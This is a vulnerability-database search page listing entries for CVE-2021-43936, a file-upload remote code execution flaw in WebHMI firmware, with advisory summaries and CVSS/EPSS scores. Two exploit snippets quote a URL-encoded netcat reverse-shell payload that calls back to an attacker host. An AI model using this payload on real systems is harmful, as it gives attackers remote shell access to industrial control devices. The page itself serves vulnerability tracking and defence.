Lucene search
+L

7 matches found

redhatcve
redhatcve
added 2025/05/22 9:29 p.m.9 views

CVE-2021-43936

The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution...

10CVSS7.3AI score0.35804EPSS
Exploits5
zdt
zdt
added 2021/12/13 12:0 a.m.184 views

WebHMI 4.0 - Remote Code Execution Exploit

Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" + localport + """+/tmp/f"...

10CVSS9.2AI score0.35804EPSS
Exploits5
packetstorm
packetstorm
added 2021/12/13 12:0 a.m.206 views

WebHMI 4.0 Remote Code Execution

Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Date: 12/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" +...

10CVSS9.6AI score0.35804EPSS
Exploits5
githubexploit
githubexploit
added 2021/12/12 10:31 p.m.546 views

Exploit for Unrestricted Upload of File with Dangerous Type in Webhmi Webhmi_Firmware

CVE-2021-43936 CVE-2021-43936 is a critical vulnerability CV...

10CVSS9.9AI score0.35804EPSS
Exploits5
cvelist
cvelist
added 2021/12/06 5:39 p.m.35 views

CVE-2021-43936 Distributed Data Systems WebHM

The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution...

10CVSS10AI score0.35804EPSS
Exploits5References2
cve
cve
added 2021/12/06 5:39 p.m.151 views

CVE-2021-43936

The CVE-2021-43936 issue affects WebHMI firmware versions prior to 4.1, enabling an Unrestricted Upload of File with Dangerous Type that can lead to arbitrary code execution. ExploitDB documents a WebHMI 4.0 RCE path requiring authentication, where an uploaded PHP payload and a reverse-shell work...

10CVSS9.7AI score0.35804EPSS
Exploits5References2Affected Software1
checkpoint_advisories
checkpoint_advisories
added 2016/07/26 12:0 a.m.138 views

Command Injection Over HTTP (CVE-2019-9166; CVE-2021-43936; CVE-2022-1813; CVE-2022-24086; CVE-2022-24193; CVE-2022-26536; CVE-2022-32092; CVE-2022-37810; CVE-2022-40048)

A command Injection over HTTP vulnerability has been reported. A remote attacker can exploit this issue by sending a specially crafted request to the victim. Successful exploitation would allow an attacker to execute arbitrary code on the target machine...

10CVSS3.9AI score0.99199EPSS
Exploits18
Rows per page
Query Builder